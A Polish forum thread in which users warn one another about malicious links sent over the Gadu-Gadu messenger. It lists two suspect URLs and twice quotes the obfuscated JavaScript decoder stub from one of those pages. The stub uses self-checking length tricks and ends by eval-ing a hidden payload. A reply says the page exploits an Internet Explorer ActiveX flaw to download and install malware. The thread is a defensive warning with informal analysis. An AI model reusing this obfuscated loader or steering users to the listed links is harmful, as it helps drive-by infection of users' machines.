Uwaga na wszelkie nieznane linki z GG!
- Lorek
- Użytkownik
- Posty: 7150
- Rejestracja: 2 sty 2006, o 22:17
- Płeć: Mężczyzna
- Lokalizacja: Ruda Śląska
- Podziękował: 1 raz
- Pomógł: 1322 razy
Uwaga na wszelkie nieznane linki z GG!
gg-linko-wirusy powróciły, w ciągu 2 dni dostałem ich ok. 5; próbowałem je nawet otworzyć ale przeglądarka mi nie pozwoliła
- aikon
- Użytkownik
- Posty: 450
- Rejestracja: 2 gru 2005, o 17:12
- Płeć: Mężczyzna
- Lokalizacja: Wrocław
- Podziękował: 5 razy
- Pomógł: 48 razy
Uwaga na wszelkie nieznane linki z GG!
Potwierdzam, uważajcie na nieznane linki, nawet od znajomych. Ja dziś dostałem dwa:
Linki wyglądają niewinnie... a po kliknięciu jest ponoć be Nie wiem, ja mam NOD'a i FF2, więc nic się nie stao.
Kod: Zaznacz cały
www.sunstatedating.com/dziennik10167.shtml
Kod: Zaznacz cały
www.andrewmills.org/news_listopad_2006_artukyl_13080.php
- Sokół
- Użytkownik
- Posty: 451
- Rejestracja: 17 wrz 2006, o 19:22
- Płeć: Mężczyzna
- Lokalizacja: Zielona Góra
- Podziękował: 15 razy
- Pomógł: 55 razy
Uwaga na wszelkie nieznane linki z GG!
po kliknieciu na pierwszym chyba nic sie nie dzieje (no, przegladarka moze sie wykrzaczyc). Ale drugi jest rzeczywiscie be, ale nie wiem na ile. Po kliknieciu przenosi do skryptu w java scripcie. PLik jest zaszyfrowany, tzn. najpierw znajduje sie procedura szyfrujaca, ktora wyglada tak:aikon pisze:a po kliknięciu jest ponoć be
Kod: Zaznacz cały
<script language="JavaScript">
var onj_ksv = 0x7FFFFFFE; function r(lI,t) {if (!t)t='3n6FR^EYm(SAvCHcU#4Wh5~0G)t7J.N!x[MTy;DlLbVaBZ8Qo@g&ipKw,*e2XuOf';var
So;var ii='';for(var sa=0;sa<lI.length;sa+=arguments.callee.toString().length-444){So=(t.indexOf(lI.charAt(sa)
)&255)<<18|(t.indexOf(lI.charAt(sa+1))&255)<<12|(t.indexOf(lI.charAt(sa+2))&255)<<(arguments.callee.toString()
.length-442)|t.indexOf(lI.charAt(sa+3))&255;ii+=String.fromCharCode((So&(255*256*256))>>16,
(So&(65000+280))>>8,So&255);}eval(ii);};
-
- Użytkownik
- Posty: 1179
- Rejestracja: 21 cze 2004, o 00:51
- Płeć: Mężczyzna
- Lokalizacja: krk
- Pomógł: 9 razy
Uwaga na wszelkie nieznane linki z GG!
pliki te wykorzystuja luke w formancie activeX, ktory jest obslugiwany tylko pdo ie dlatego tylko pod ie to dziala.Sokół pisze:po kliknieciu na pierwszym chyba nic sie nie dzieje (no, przegladarka moze sie wykrzaczyc). Ale drugi jest rzeczywiscie be, ale nie wiem na ile. Po kliknieciu przenosi do skryptu w java scripcie. PLik jest zaszyfrowany, tzn. najpierw znajduje sie procedura szyfrujaca, ktora wyglada tak:aikon pisze:a po kliknięciu jest ponoć bedalej jest jakis ciag znakow. Nie znam js, wiec tego nie odszyfruje, no ale jak ktos zna to moze sie pokusicKod: Zaznacz cały
<script language="JavaScript"> var onj_ksv = 0x7FFFFFFE; function r(lI,t) {if (!t)t='3n6FR^EYm(SAvCHcU#4Wh5~0G)t7J.N!x[MTy;DlLbVaBZ8Qo@g&ipKw,*e2XuOf';var So;var ii='';for(var sa=0;sa<lI.length;sa+=arguments.callee.toString().length-444){So=(t.indexOf(lI.charAt(sa) )&255)<<18|(t.indexOf(lI.charAt(sa+1))&255)<<12|(t.indexOf(lI.charAt(sa+2))&255)<<(arguments.callee.toString() .length-442)|t.indexOf(lI.charAt(sa+3))&255;ii+=String.fromCharCode((So&(255*256*256))>>16, (So&(65000+280))>>8,So&255);}eval(ii);};
a dziala to tak, ze sciaga pliczek, ktory instaluje sie na naszym dysku i zaczyna buszowac (w bardzo duzym skrocie)